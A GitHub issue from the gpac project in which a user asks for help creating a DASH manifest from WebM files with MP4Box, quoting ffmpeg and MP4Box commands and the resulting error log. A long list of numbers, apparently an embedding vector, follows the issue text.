This is a GitHub Issue repo:gpac owner:gpac Title : Need some help with dashing webm files Issue date: --- start body --- Hello, I am lost in creating a dash manifest for webm files and I hope you can help me. I am creating webm files with ffmpeg: ``` ffmpeg -y -i $videoFilePath -c:v libvpx -keyint_min 150 -g 150 -tile-columns 4 -frame-parallel 1 ` -f webm -dash 1 -an -s 320x180 -b:v 500k ${dashFolder}/360p-30-700k.webm ``` When I now try to create the dash manifest, i get this: ``` [Dasher] No bitrate property assigned to PID video1, computing from bitstream [Dasher] No bitrate property assigned to PID video1, computing from bitstream [Dasher] No bitrate property assigned to PID video1, computing from bitstream [Dasher] No bitrate property assigned to PID video1, computing from bitstream [Dasher] No bitrate property assigned to PID audio1, computing from bitstream [Dasher] Cannot find VPX config, using default vp08 [Dasher] Cannot find VPX config, using default vp08 [Dasher] Cannot find VPX config, using default vp08 [Dasher] Cannot find VPX config, using default vp08 [Dasher] codec parameters not known, cannot set codec string [MP4Mux] No decoder specific info found for VP08 Failed to connect filter dasher PID video1 to filter mp4mx: BitStream Not Compliant Blacklisting mp4mx as output from dasher and retrying connections [MP4Mux] No decoder specific info found for VP08 Failed to connect filter dasher PID video1 to filter mp4mx: BitStream Not Compliant Blacklisting mp4mx as output from dasher and retrying connections [MP4Mux] No decoder specific info found for VP08 Failed to connect filter dasher PID video1 to filter mp4mx: BitStream Not Compliant Blacklisting mp4mx as output from dasher and retrying connections [MP4Mux] No decoder specific info found for VP08 Failed to connect filter dasher PID video1 to filter mp4mx: BitStream Not Compliant Blacklisting mp4mx as output from dasher and retrying connections No filter chain found for PID video1 in filter dasher to any loaded filters - NOT CONNECTED No filter chain found for PID video1 in filter dasher to any loaded filters - NOT CONNECTED No filter chain found for PID video1 in filter dasher to any loaded filters - NOT CONNECTED No filter chain found for PID video1 in filter dasher to any loaded filters - NOT CONNECTED [MP4Mux] Done writing segment 1 - estimated next fragment times start 0.002 end 2 Filters not connected: fout (dst=C:/Users/AndreGa/Desktop/Converter/v7/ASM_1stSteps_ConfiguringParameterset_noUT/dash/360p-30-700k_dash_rep1init.mp4:gfopt:segdur=4000/1000:profile=onDemand:buf=1500:!check_dur:ps sh=v:subs_sidx=0:frag:xps_inband=no:psshs=moov:mime=video/mp4) (ptr=000001EA6E2AFCE0) fout (dst=C:/Users/AndreGa/Desktop/Converter/v7/ASM_1stSteps_ConfiguringParameterset_noUT/dash/480p-30-1250k_dash_rep2init.mp4:gfopt:segdur=4000/1000:profile=onDemand:buf=1500:!check_dur:p ssh=v:subs_sidx=0:frag:xps_inband=no:psshs=moov:mime=video/mp4) (ptr=000001EA6E2B0540) fout (dst=C:/Users/AndreGa/Desktop/Converter/v7/ASM_1stSteps_ConfiguringParameterset_noUT/dash/720p-30-2500k_dash_rep3init.mp4:gfopt:segdur=4000/1000:profile=onDemand:buf=1500:!check_dur:p ssh=v:subs_sidx=0:frag:xps_inband=no:psshs=moov:mime=video/mp4) (ptr=000001EA6E2B1DB0) fout (dst=C:/Users/AndreGa/Desktop/Converter/v7/ASM_1stSteps_ConfiguringParameterset_noUT/dash/1080p-30-4500k_dash_rep4init.mp4:gfopt:segdur=4000/1000:profile=onDemand:buf=1500:!check_dur: pssh=v:subs_sidx=0:frag:xps_inband=no:psshs=moov:mime=video/mp4) (ptr=000001EA6E2B2610) Error DASHing file: Internal Service Error ``` The command looks like this: ``` MP4Box -dash 4000 -frag 4000 -rap -profile onDemand -out ${dashFolder}/manifest.mpd ` ${dashFolder}/360p-30-700k.webm ` ${dashFolder}/480p-30-1250k.webm ` ${dashFolder}/720p-30-2500k.webm ` ${dashFolder}/1080p-30-4500k.webm ` ${dashFolder}/audio.webm ``` I tried it with following. Some new webm files will be created but no manifest. ``` MP4Box -dash 4000 -frag 4000 -rap -profile onDemand -out ${dashFolder}/manifest.mpd --muxtype=webm ` ${dashFolder}/360p-30-700k.webm ` ${dashFolder}/480p-30-1250k.webm ` ${dashFolder}/720p-30-2500k.webm ` ${dashFolder}/1080p-30-4500k.webm ` ${dashFolder}/audio.webm ``` How do i get the dash manifest? The manifest I can create with ffmpeg can not be read correctly by the videojs player . So I hope mp4box can create a working manifest. Thank you. --- end body ---
4,480
[ -0.024455472826957703, 0.0313134491443634, -0.023672202602028847, 0.00024518027203157544, 0.01675330474972725, -0.007554217241704464, -0.020295431837439537, 0.03321070596575737, -0.03413322567939758, 0.030216868966817856, 0.020278025418519974, -0.008537658490240574, -0.0032853882294148207, -0.010983205400407314, -0.013011008501052856, 0.011470573954284191, -0.022401561960577965, 0.008250459097325802, -0.022714870050549507, 0.003189655253663659, 0.0005950686754658818, 0.024838406592607498, -0.0028763466980308294, 0.042958084493875504, -0.02151385508477688, 0.019773250445723534, -0.01662275940179825, 0.023863667622208595, -0.019077010452747345, 0.0052522700279951096, 0.013594110496342182, 0.012105894275009632, -0.00899891834706068, 0.0027762618847191334, 0.03206190839409828, 0.001403361209668219, 0.06582961231470108, 0.05649997666478157, -0.010139012709259987, 0.0024934138637036085, 0.0061530317179858685, -0.02908547781407833, -0.047553274780511856, 0.026648633182048798, -0.03181822597980499, 0.00939925666898489, -0.010095497593283653, -0.008006773889064789, -0.004830173682421446, -0.04247071593999863, 0.018781106919050217, -0.023254457861185074, -0.031626757234334946, -0.04254033789038658, -0.004690925125032663, -0.06499411910772324, 0.03853695094585419, 0.009390553459525108, 0.006683915853500366, 0.03442912921309471, 0.018380768597126007, -0.03592604771256447, -0.02207084745168686, 0.04431575536727905, -0.0018015241948887706, 0.0014392611337825656, -0.03770146146416664, 0.05270546302199364, -0.012584560550749302, 0.02193159982562065, 0.03679635003209114, -0.038571763783693314, 0.0025869712699204683, 0.031156795099377632, 0.004053429234772921, -0.05782283470034599, 0.035299431532621384, 0.009434068575501442, -0.0076934657990932465, 0.030303899198770523, -0.0525314025580883, -0.009747377596795559, -0.04156560078263283, 0.008089452981948853, 0.020573928952217102, 0.006274874322116375, -0.045638613402843475, -0.0633927658200264, 0.008650797419250011, -0.03528202325105667, -0.016387777402997017, 0.013802982866764069, 0.03839770331978798, -0.010765629820525646, -0.005113021470606327, 0.04027755558490753, 0.0015197640750557184, -0.006831867154687643, -0.05782283470034599, -0.05406313017010689, -0.02610904723405838, 0.009616832248866558, 0.026822693645954132, -0.021548666059970856, 0.018520016223192215, 0.0027153408154845238, 0.023358892649412155, -0.028545890003442764, 0.017406031489372253, 0.0673961490392685, 0.03543867915868759, 0.014029260724782944, -0.002321529434993863, 0.02121795155107975, 0.00952980201691389, 0.011427058838307858, -0.012210330925881863, -0.05684809759259224, 0.018276331946253777, 0.026370136067271233, -0.001394658233039081, 0.0022954202722758055, -0.038571763783693314, 0.03181822597980499, -0.028110740706324577, 0.07038998603820801, -0.035194993019104004, 0.004860633984208107, 0.005726584233343601, -0.013890013098716736, -0.05030342936515808, -0.035856422036886215, 0.001753657590597868, -0.010461024940013885, 0.010487133637070656, 0.010739521123468876, -0.04167003929615021, 0.027605965733528137, -0.001264113001525402, 0.00937314797192812, -0.015151949599385262, -0.042818836867809296, 0.031470105051994324, 0.022941147908568382, -0.011409653350710869, 0.011113750748336315, 0.017423436045646667, 0.033941760659217834, -0.01622242107987404, 0.012836948037147522, -0.030773863196372986, 0.0037749330513179302, -0.006757891271263361, -0.004455944057554007, 0.0310523584485054, -0.013559297658503056, -0.031383074820041656, 0.013437455520033836, 0.009938843548297882, -0.016048360615968704, 0.0024390199687331915, -0.03589123487472534, 0.00571788102388382, -0.007214799989014864, 0.01342875324189663, -0.016265936195850372, -0.005543821025639772, 0.00881180353462696, -0.017101425677537918, 0.021130921319127083, -0.009094650857150555, -0.004164393059909344, 0.01965140923857689, -0.0269097238779068, -0.06182622164487839, -0.01128781121224165, 0.011653337627649307, 0.04323657974600792, -0.0010492573492228985, -0.011322623118758202, -0.02757115289568901, -0.026544196531176567, 0.005835372023284435, 0.01755398139357567, 0.003148315940052271, -0.0059920260682702065, 0.03512537106871605, -0.025064684450626373, -0.015056217089295387, -0.009416663087904453, 0.01423813309520483, 0.04466387629508972, 0.003102625021710992, 0.010748224332928658, 0.04233146831393242, -0.015439148992300034, -0.024472879245877266, -0.017928211018443108, -0.0008969545015133917, -0.012880463153123856, -0.019529566168785095, -0.018206708133220673, 0.03296702355146408, -0.005387166514992714, -0.03472503274679184, 0.040799736976623535, -0.003931587096303701, 0.031226418912410736, 0.03307145833969116, -0.0355779267847538, -0.030356118455529213, -0.040590863674879074, 0.028702544048428535, 0.009242602623999119, 0.0028132498264312744, 0.013594110496342182, -0.018520016223192215, -0.012819541618227959, -0.015778567641973495, -0.006079056300222874, 0.006888436619192362, -0.04595192149281502, -0.02066095918416977, 0.006814461201429367, -0.027484122663736343, -0.02504727803170681, 0.0019505632808431983, -0.01522157434374094, -0.01885073073208332, 0.023324081674218178, 0.020190995186567307, 0.03281036764383316, 0.010582867078483105, 0.010043280199170113, 0.0010372906690463424, 0.000035050034057348967, -0.014681987464427948, -0.006692619062960148, -0.02414216473698616, 0.021130921319127083, -0.02106129750609398, 0.013498377054929733, 0.002330232411623001, 0.0035747636575251818, -0.01168814953416586, 0.0415307879447937, 0.021496448665857315, -0.0026109046302735806, -0.013367831707000732, -0.023219645023345947, 0.015674130991101265, -0.022801900282502174, -0.003324551973491907, -0.012184221297502518, -0.028441455215215683, 0.04595192149281502, 0.03714447095990181, 0.02515171468257904, 0.01013031043112278, -0.04093898460268974, 0.025621676817536354, 0.009294820949435234, -0.023672202602028847, -0.020539116114377975, 0.01664016582071781, -0.042401090264320374, -0.008132968097925186, -0.0005064067081548274, -0.010704709216952324, -0.02868513949215412, 0.008972808718681335, -0.025221338495612144, -0.020452085882425308, 0.006166086532175541, -0.028093334287405014, -0.03885026276111603, 0.005556875374168158, -0.005748341791331768, 0.038780637085437775, -0.020904643461108208, -0.0013913946459069848, 0.035751987248659134, -0.0014479642268270254, -0.0023411111906170845, -0.025586865842342377, -0.000727245700545609, 0.005522063467651606, -0.02720562554895878, -0.04776214808225632, 0.007667356636375189, 0.008067695423960686, 0.03390694782137871, -0.014229429885745049, 0.01297619566321373, 0.022262314334511757, 0.030164651572704315, 0.012819541618227959, 0.0030330009758472443, 0.04783177375793457, 0.010469727218151093, -0.03361104428768158, 0.013594110496342182, 0.0051957000978291035, -0.016100578010082245, -0.038328081369400024, 0.012340876273810863, -0.03321070596575737, 0.023097803816199303, 0.006962412502616644, -0.03634379431605339, 0.014534035697579384, -0.005613444838672876, -0.036065295338630676, 0.008533306419849396, -0.05542080104351044, 0.026996754109859467, 0.028441455215215683, -0.024072540923953056, -0.023950697854161263, -0.009747377596795559, -0.005730935838073492, -0.01043491531163454, -0.07331420481204987, 0.03270593285560608, 0.003964223433285952, -0.027501529082655907, -0.05354095250368118, -0.025465022772550583, -0.04556898772716522, 0.01701439544558525, -0.0052696759812533855, 0.01757138781249523, 0.030617209151387215, -0.007114714942872524, 0.019564379006624222, -0.034498754888772964, -0.0323404036462307, -0.02036505565047264, 0.022157877683639526, 0.009355741553008556, -0.014899562112987041, 0.018537422642111778, 0.04118267074227333, -0.01945994235575199, 0.024176977574825287, -0.010765629820525646, 0.010260854847729206, 0.02092204988002777, 0.02353295311331749, -0.016205014660954475, 0.0016851213295012712, 0.02097426727414131, 0.020278025418519974, 0.02020840160548687, -0.006892788223922253, -0.001105826930142939, -0.010739521123468876, -0.03770146146416664, 0.008459331467747688, 0.0018624452641233802, -0.02529096230864525, -0.011984052136540413, -0.0020408572163432837, 0.02187938056886196, 0.02459472231566906, 0.01361151598393917, -0.0460563562810421, -0.03603048250079155, -0.024055134505033493, 0.009320929646492004, 0.0027240437921136618, 0.023254457861185074, -0.06213952973484993, 0.030112434178590775, -0.04804064705967903, -0.023393705487251282, 0.019477348774671555, -0.015334713272750378, -0.07735240459442139, 0.007649950683116913, -0.038223642855882645, 0.011479277163743973, 0.044837936758995056, -0.01975584588944912, 0.0003875561524182558, 0.031383074820041656, -0.009303523227572441, 0.006953709293156862, -0.012132003903388977, -0.036204542964696884, -0.029451005160808563, -0.00268923188559711, -0.03637860342860222, -0.01103542372584343, -0.015030107460916042, -0.006470691878348589, -0.0004191045882180333, -0.012079785577952862, 0.02892882376909256, -0.010826551355421543, 0.047796960920095444, -0.017754152417182922, 0.006749188527464867, 0.03284518048167229, -0.01773674599826336, 0.03613492101430893, 0.002869819290935993, -0.003102625021710992, 0.03188784793019295, -0.02318483404815197, -0.011226889677345753, -0.024681752547621727, -0.018119677901268005, 0.011113750748336315, 0.01940772496163845, 0.030356118455529213, 0.016152797266840935, 0.02918991446495056, -0.027832243591547012, -0.012410500086843967, 0.00899891834706068, -0.006966763641685247, -0.0017395152244716883, 0.013385238125920296, 0.015491367317736149, 0.03214893862605095, -0.030460553243756294, 0.01680552214384079, 0.03119160793721676, -0.0012369160540401936, 0.009085948579013348, -0.0474836528301239, 0.004912852309644222, -0.03679635003209114, 0.013846497982740402, 0.0035464786924421787, -0.02262783981859684, 0.018328551203012466, -0.014177212491631508, 0.0037270663306117058, -0.029398785904049873, 0.011044126935303211, 0.010034576989710331, 0.035751987248659134, 0.0024607775267213583, -0.04804064705967903, -0.038223642855882645, -0.03770146146416664, 0.006000729277729988, -0.01996471732854843, 0.01781507208943367, 0.03174860030412674, -0.013559297658503056, -0.015186761505901814, -0.013898715376853943, 0.0035921696107834578, -0.00019595383491832763, -0.0007740244618616998, 0.013376534916460514, -0.042818836867809296, -0.01013031043112278, 0.012889165431261063, -0.0023280566092580557, 0.016605352982878685, 0.02403772808611393, 0.0019951662980020046, -0.04048642888665199, -0.019181445240974426, -0.0003293547488283366, -0.01664886809885502, -0.012497530318796635, -0.014925671741366386, 0.04960718750953674, 0.015404337085783482, -0.005265324376523495, 0.03241002932190895, -0.006205250043421984, -0.029920967295765877, 0.026317918673157692, -0.020678365603089333, -0.032775554805994034, -0.02379404380917549, 0.04358470067381859, -0.008472385816276073, 0.0009622271172702312, -0.0342898815870285, -0.025586865842342377, -0.002036505611613393, -0.007027685176581144, 0.017719339579343796, 0.012306063435971737, 0.027153408154845238, -0.021635696291923523, -0.00015583836648147553, 0.0034485699143260717, 0.003944641910493374, -0.00704509112983942, 0.0203128382563591, 0.006070353090763092, 0.003468151669949293, 0.001580685144290328, 0.006079056300222874, -0.02429881878197193, 0.014255539514124393, 0.05044267699122429, 0.012036270461976528, -0.022714870050549507, 0.03592604771256447, -0.04299289733171463, -0.01144446525722742, -0.016361668705940247, 0.0036443877033889294, 0.009486286900937557, -0.027188220992684364, -0.0029568495228886604, -0.04950275272130966, -0.016370372846722603, 0.025969797745347023, 0.03018205799162388, 0.0035965212155133486, -0.00572223262861371, -0.022993367165327072, -0.008119913749396801, 0.03599567338824272, -0.0026827044785022736, 0.007706520147621632, 0.017171049490571022, -0.02041727490723133, -0.0014272945700213313, -0.009199087508022785, -0.036413416266441345, 0.0033114973921328783, -0.0029242131859064102, 0.038432516157627106, -0.010817848145961761, 0.01624852977693081, -0.011296514421701431, 0.01789340004324913, 0.01637907512485981, -0.006392364855855703, -0.041356731206178665, 0.021600883454084396, -0.05761396139860153, 0.01310674101114273, -0.04863245040178299, -0.018989980220794678, 0.001112898113206029, -0.010983205400407314, 0.0026348379906266928, 0.010513242334127426, 0.02106129750609398, -0.02778002619743347, 0.026370136067271233, 0.016683680936694145, 0.009703862480819225, 0.019947310909628868, 0.02661382034420967, 0.000978001393377781, 0.001470809569582343, -0.01078303623944521, 0.020782800391316414, 0.0035747636575251818, 0.0267182569950819, -0.00937314797192812, -0.0011281283805146813, 0.002852413337677717, 0.005300136283040047, 0.001706878887489438, -0.03693559765815735, -0.007323587313294411, 0.02142682485282421, -0.0035377757158130407, 0.026892317458987236, -0.0006037717103026807, -0.01813708432018757, 0.011635931208729744, 0.028754763305187225, 0.007932798936963081, -0.002680528676137328, -0.01168814953416586, 0.03780589997768402, -0.013045820407569408, 0.006836218759417534, -0.007810956332832575, 0.011200780980288982, 0.027344875037670135, 0.011888318695127964, 0.013211177662014961, -0.03613492101430893, -0.0026326621882617474, 0.0067535401321947575, 0.004660464823246002, 0.003970750607550144, -0.010817848145961761, 0.03063461370766163, -0.013402643613517284, -0.0032092370092868805, 0.03623935580253601, 0.042052969336509705, -0.02020840160548687, -0.030077621340751648, 0.04852801561355591, -0.017466951161623, -0.001769975759088993, -0.022540809586644173, -0.007071199826896191, 0.020295431837439537, -0.007871877402067184, -0.0382932685315609, -0.006583831273019314, 0.004556028638035059, -0.013829091563820839, 0.06875382363796234, 0.006810109596699476, 0.004738791845738888, 0.0111920777708292, 0.013167662546038628, 0.012993602082133293, -0.004321047104895115, 0.002171402331441641, 0.001985375303775072, -0.02348073571920395, 0.01131391990929842, -0.03804958239197731, 0.017771556973457336, 0.04139154031872749, 0.004029496107250452, -0.009260008111596107, -0.01935550570487976, -0.03392435237765312, -0.015917815268039703, 0.0016513972077518702, 0.013245989568531513, -0.01945994235575199, 0.014829938299953938, -0.005487251095473766, 0.023707013577222824, -0.03305405378341675, -0.010887471958994865, -0.032479654997587204, -0.03599567338824272, -0.01131391990929842, -0.01874629594385624, 0.04393282160162926, -0.029398785904049873, 0.02560427226126194, 0.02334148809313774, 0.002258432563394308, 0.023010773584246635, 0.04250552877783775, -0.021287575364112854, -0.03458578512072563, 0.016901256516575813, 0.01717975176870823, 0.037214092910289764, -0.034794654697179794, 0.013715952634811401, 0.010574163869023323, -0.023724419996142387, 0.005552523769438267, -0.010704709216952324, -0.014873453415930271, 0.024507692083716393, -0.014577550813555717, -0.00024572419351898134, 0.011340029537677765, -0.0063532013446092606, 0.038328081369400024, 0.010400103405117989, 0.024716563522815704, 0.04783177375793457, -0.0397205613553524, 0.03672672435641289, 0.011627228930592537, 0.0069319517351686954, -0.03317589312791824, -0.0057962085120379925, 0.020243214443325996, 0.01310674101114273, -0.0005412187892943621, 0.022262314334511757, 0.0035268969368189573, -0.018154490739107132, 0.012132003903388977, 0.002280190121382475, 0.0097995949909091, -0.02485581301152706, -0.0014631944941356778, 0.004157865419983864, 0.01040880661457777, 0.04257515072822571, 0.007088606245815754, 0.021496448665857315, 0.04163522645831108, -0.006170438136905432, -0.010521945543587208, 0.0021039540879428387, -0.008189537562429905, -0.012053675949573517, -0.03458578512072563, -0.0246469397097826, -0.014943077228963375, -0.00004198525130050257, -0.02273227646946907, 0.0024934138637036085, -0.0029807828832417727, -0.005274027585983276, -0.007658653426915407, -0.0121929245069623, 0.007258315104991198, 0.01845039241015911, 0.019129227846860886, 0.013158959336578846, 0.0241943821310997, 0.006457637529820204, 0.027727806940674782, -0.0018189302645623684, -0.040138307958841324, -0.03547349199652672, -0.013977042399346828, 0.010330479592084885, -0.028598109260201454, 0.003207061206921935, -0.020278025418519974, 0.004673519171774387, 0.02060873992741108, 0.0033854730427265167, 0.019895093515515327, -0.0062270076014101505, 0.007340993732213974, -0.020086560398340225, -0.032375216484069824, 0.028946230188012123, 0.023828856647014618, -0.02590017393231392, -0.0043993741273880005, 0.014655877836048603, 0.018224114552140236, 0.002378098899498582, 0.03209672123193741, -0.01295008696615696, -0.000037191792216617614, 0.0004664272419176996, -0.03073905035853386, -0.001117249601520598, -0.029433598741889, -0.017379920929670334, 0.02388107404112816, -0.03451615944504738, 0.002441195771098137, 0.0039054781664162874, 0.007850119844079018, 0.012245142832398415, -0.04671778529882431, -0.010722114704549313, 0.004403725732117891, 0.012497530318796635, -0.017963023856282234, -0.006849273107945919, -0.015360821969807148, -0.00020411290461197495, 0.00022668635938316584, -0.016448698937892914, 0.00849414337426424, -0.019285881891846657, -0.030512772500514984, 0.012541045434772968, 0.010060685686767101, 0.01368114072829485, -0.03289739787578583, -0.023567765951156616, -0.00506515521556139, 0.006357552949339151, -0.001560015487484634, 0.009782189503312111, -0.0158481914550066, -0.03669191151857376, -0.015691537410020828, 0.009225196205079556, 0.012079785577952862, -0.03526461869478226, 0.0025260502006858587, -0.049816060811281204, 0.013167662546038628, -0.01167074404656887, -0.040138307958841324, 0.039024319499731064, 0.011853506788611412, -0.00826786458492279, 0.010713412426412106, 0.010826551355421543, -0.013115444220602512, 0.018154490739107132, -0.04052124172449112, 0.020347649231553078, 0.006631697993725538, 0.028598109260201454, 0.0035421273205429316, 0.002378098899498582, -0.006057298742234707, -0.020243214443325996, -0.020190995186567307, 0.009721267968416214, -0.027797430753707886, -0.010043280199170113, -0.021496448665857315, -0.03416803851723671, -0.012027567252516747, -0.030913110822439194, 0.02983393706381321, -0.0042927623726427555, -0.004721385892480612, 0.008955403231084347, -0.01449052058160305, 0.006200898438692093, -0.002140941796824336, -0.003781460225582123, -0.005639554001390934, -0.030965328216552734, 0.04932869225740433, -0.03961612656712532, 0.016074469313025475, 0.021896786987781525, -0.016074469313025475, -0.005556875374168158, -0.01333301980048418, 0.0036944299936294556, -0.0011183375027030706, 0.02106129750609398, 0.027727806940674782, -0.004375440999865532, 0.006766594480723143, -0.03159194439649582, 0.01975584588944912, -0.04167003929615021, 0.036169733852148056, 0.022801900282502174, 0.00521745765581727, -0.019181445240974426, 0.01410758774727583, -0.03533424437046051, 0.02217528410255909, -0.04233146831393242, -0.01885073073208332, 0.0079893684014678, -0.010765629820525646, 0.0018646210664883256, -0.03004280850291252, -0.0059572141617536545, 0.025917580351233482, 0.027083784341812134, 0.029659876599907875, -0.00026870559668168426, 0.04438537731766701, -0.029607659205794334, -0.002972079673781991, -0.017980430275201797, 0.024229194968938828, 0.016422590240836143, -0.020382462069392204, 0.029050664976239204, 0.03225337341427803, -0.043515078723430634, 0.003000364638864994, 0.008058992214500904, 0.00036579862353391945, -0.002887225477024913, -0.05872794985771179, -0.00965164415538311, 0.0027218679897487164, -0.01499529555439949, 0.0005020552198402584, -0.00540457246825099, -0.010139012709259987, -0.029451005160808563, 0.0092513058334589, -0.036622289568185806, 0.03140047937631607, -0.02146163582801819, 0.00937314797192812, 0.0185026116669178, 0.013185068033635616, -0.0028458861634135246, -0.023672202602028847, 0.020295431837439537, -0.020225808024406433, -0.007580326404422522, -0.000838753127027303, -0.007941501215100288, 0.0025847957003861666, 0.007863174192607403, 0.011775179766118526, -0.021479042246937752, -0.015256386250257492, 0.004025144502520561, 0.03265371546149254, 0.0052696759812533855, -0.03627416864037514, -0.006453285925090313, -0.027692995965480804, -0.01030436996370554, -0.0049998825415968895, 0.01919885165989399, -0.006823163945227861, 0.009260008111596107, -0.02797149121761322, 0.0001562463294249028, -0.01582208275794983, 0.010391400195658207, -0.012010161764919758, -0.006588182877749205, -0.013489673845469952, 0.018032647669315338, 0.025029871612787247, -0.030652020126581192, -0.03549089655280113, -0.017501763999462128, -0.0023802747018635273, 0.013663734309375286, 0.021653102710843086, -0.033889543265104294, 0.008011125959455967, 0.015682833269238472, 0.02762337028980255, -0.0008159077260643244, -0.01576986350119114, -0.050721172243356705, 0.033036645501852036, -0.0035203697625547647, -0.002142029581591487, 0.018885543569922447, -0.004825822077691555, 0.001496918615885079, -0.02142682485282421, 0.0018722361419349909, -0.024507692083716393, -0.015883002430200577, 0.00710601219907403, 0.007032036315649748, -0.041043419390916824, 0.035403866320848465, 0.020991673693060875, -0.00565695995464921, -0.024107351899147034, 0.007153878919780254, 0.01784118078649044, -0.008872724138200283, 0.00937314797192812, -0.0328625850379467, -0.037214092910289764, 0.007584678009152412, -0.023915886878967285, -0.02435103803873062, -0.0027849648613482714, -0.021096110343933105, -0.031330857425928116, -0.034655407071113586, -0.013341723009943962, 0.04560380056500435, 0.026074234396219254, -0.006866679061204195, 0.0009785452857613564, -0.019634002819657326, 0.0038380299229174852, 0.0036617936566472054, 0.011522792279720306, -0.009007620625197887, 0.004978124983608723, -0.026544196531176567, -0.023968104273080826, 0.016527026891708374, -0.017371218651533127, -0.017397327348589897, 0.022001223638653755, -0.022697463631629944, 0.027536340057849884, -0.0030591099057346582, -0.012532342225313187, -0.01738862507045269, -0.024472879245877266, -0.01818930171430111, -0.03510796278715134, 0.021392012014985085, -0.013576704077422619, 0.017580091953277588, 0.0033941760193556547, 0.01925107091665268, -0.019077010452747345, 0.015604506246745586, 0.017110127955675125, -0.008019829168915749, 0.003944641910493374, 0.026474572718143463, -0.024403255432844162, 0.03345439210534096, -0.005896293092519045, 0.022993367165327072, -0.012236439622938633, 0.012219034135341644, -0.009764783084392548, -0.027501529082655907, -0.01909441500902176, -0.000049362417485099286, 0.018380768597126007, 0.03992943465709686, 0.025273557752370834, 0.02092204988002777, -0.011984052136540413, -0.02605682797729969, 0.023567765951156616, -0.03442912921309471, -0.017005691304802895, 0.0058136144652962685, 0.020173590630292892, -0.018659265711903572, -0.02086983062326908, -0.003283212659880519, 0.008141671307384968, 0.012932680547237396, 0.032479654997587204, 0.014194617979228497, -0.009294820949435234, 0.016318153589963913, 0.0010916844476014376, 0.005565578583627939, 0.02328926883637905, -0.012271251529455185, -0.013820388354361057, 0.022349344566464424, 0.02193159982562065, -0.011496683582663536, 0.010582867078483105, 0.013089335523545742, 0.03462059423327446, 0.012314766645431519, 0.024629533290863037, 0.01945994235575199, -0.04769252613186836, -0.01643129251897335, -0.0052696759812533855, 0.0035051393788307905, 0.022314531728625298, -0.0004305272886995226, 0.004573434591293335, -0.017606200650334358, 0.004760549403727055, 0.013063225895166397, 0.01855482906103134, -0.0159787368029356, 0.00042780759395100176, 0.0026740015018731356, 0.003170073265209794, 0.06732653081417084, -0.0016524851089343429, -0.014447005465626717, -0.00773698091506958, 0.006714376620948315, -0.010400103405117989, 0.015238979831337929, 0.010217339731752872, 0.004769252613186836, -0.018467798829078674, 0.016318153589963913, -0.01829373836517334, -0.019721033051609993, -0.019372912123799324, -0.013289504684507847, -0.004603895358741283, 0.009860516525804996, 0.01579597219824791, 0.008237403817474842, 0.012279954738914967, -0.017649715766310692, -0.014098885469138622, 0.007663005031645298, -0.0195991899818182, 0.013350425288081169, -0.0314352922141552, -0.011487980373203754, -0.013402643613517284, -0.0022247082088142633, -0.021392012014985085, 0.017432140186429024, 0.01763230934739113, -0.043515078723430634, 0.0005885414429940283, -0.0025064684450626373, -0.0003347941383253783, 0.010069388896226883, -0.02020840160548687, -0.004756197798997164, -0.004952015820890665, -0.020800206810235977, 0.008742178790271282, -0.016492214053869247, 0.005513360258191824, 0.017667122185230255, 0.08612503856420517, 0.03270593285560608, -0.015317306853830814, -0.0032027096021920443, -0.015012701973319054, -0.005012936890125275, -0.00489979749545455, 0.003720539156347513, 0.032636307179927826, 0.004516865126788616, 0.04041680321097374, -0.005487251095473766, -0.007432375103235245, -0.00430799275636673, -0.006396716460585594, -0.010817848145961761, 0.009007620625197887, -0.01773674599826336, 0.011470573954284191, 0.001555663999170065, -0.015169356018304825, 0.019529566168785095, 0.019233664497733116, -0.03522980585694313, -0.000123881982290186, -0.005482899956405163, -0.015909112989902496, -0.002132238820195198, -0.011026720516383648, -0.008881427347660065, -0.009938843548297882, -0.012784729711711407, 0.004995530936866999, -0.0004329750081524253, 0.007018981967121363, 0.0020419450011104345, -0.012758621014654636, -0.0009921437595039606, 0.007493296172469854, 0.014325163327157497, 0.0067274309694767, -0.011627228930592537, 0.01055675745010376, -0.00952980201691389, 0.011957943439483643, -0.008124264888465405, 0.003128733951598406, 0.0017525696894153953, 0.014908265322446823, -0.002410735236480832, -0.022662652656435966, -0.010487133637070656, -0.005443735979497433, 0.02217528410255909, -0.01818930171430111, 0.012036270461976528, -0.008302676491439342, -0.0020375933963805437, 0.005374112166464329, -0.0264571662992239, 0.01799783669412136, -0.0024999412707984447, 0.012915275059640408, 0.011105047538876534, 0.0017427788116037846, 0.0087334755808115, -0.019947310909628868, 0.018363362178206444, -0.009703862480819225, 0.00751070212572813, 0.0007207184680737555, -0.003890248015522957, -0.007249611895531416, -0.010339182801544666, -0.00456038024276495, 0.027048971503973007, -0.0052696759812533855, -0.03267112001776695, -0.021809756755828857, -0.02116573415696621, 0.007288775406777859, 0.054654937237501144, 0.0010258679976686835, 0.021026484668254852, -0.008424518629908562, -0.0006315125501714647, 0.0006342322449199855, 0.007541162893176079, 0.0014359975466504693, -0.029607659205794334, 0.028389235958456993, -0.007837065495550632, 0.0032766852527856827, 0.0035334243439137936, -0.0039011265616863966, -0.02424660138785839, -0.0024433715734630823, 0.0035986967850476503, -0.0018395999213680625, -0.013063225895166397, 0.012593263760209084, -0.010226042941212654, 0.025064684450626373, 0.014168509282171726, -0.009555910713970661, 0.02746671624481678, 0.009207790717482567, 0.00013163310359232128, 0.005839723162353039, 0.004160041455179453, -0.006235710345208645, 0.007158230058848858, -0.003822799539193511, -0.0382932685315609, 0.0012205978855490685, -0.0054132756777107716, 0.006627346388995647, 0.006444582715630531, 0.000693521520588547, -0.010165122337639332, -0.024020323529839516, -0.004138283897191286, 0.02247118577361107, -0.02903326041996479, 0.03568236157298088, 0.013524485751986504, -0.012132003903388977, -0.02605682797729969, 0.013759467750787735, 0.016579244285821915, 0.021096110343933105, 0.008468033745884895, 0.007362751290202141, -0.01757138781249523, 0.03864138945937157, -0.012680293060839176, -0.0016981759108603, 0.0005053188069723547, 0.008394058793783188, -0.00023960489488672465, -0.020121371373534203, 0.008463682606816292, 0.002410735236480832, 0.008542009629309177, 0.021479042246937752, -0.005108669865876436, -0.008659500628709793, 0.0004724105529021472, 0.0198602806776762, -0.00967775285243988, 0.012366984970867634, -0.005282730329781771, 0.025273557752370834, 0.025430211797356606, 0.017092721536755562, 0.00660123722627759, 0.0043819681741297245, -0.0018929059151560068, -0.019982123747467995, -0.0036726724356412888, -0.0056090932339429855, 0.03166157007217407, 0.02757115289568901, -0.011801289394497871, 0.017649715766310692, 0.005952862557023764, -0.016361668705940247, -0.034550972282886505, -0.02494284138083458, -0.018224114552140236, -0.02132238820195198, 0.005704826675355434, -0.0021898963022977114, 0.00263918936252594, 0.026074234396219254, -0.013829091563820839, 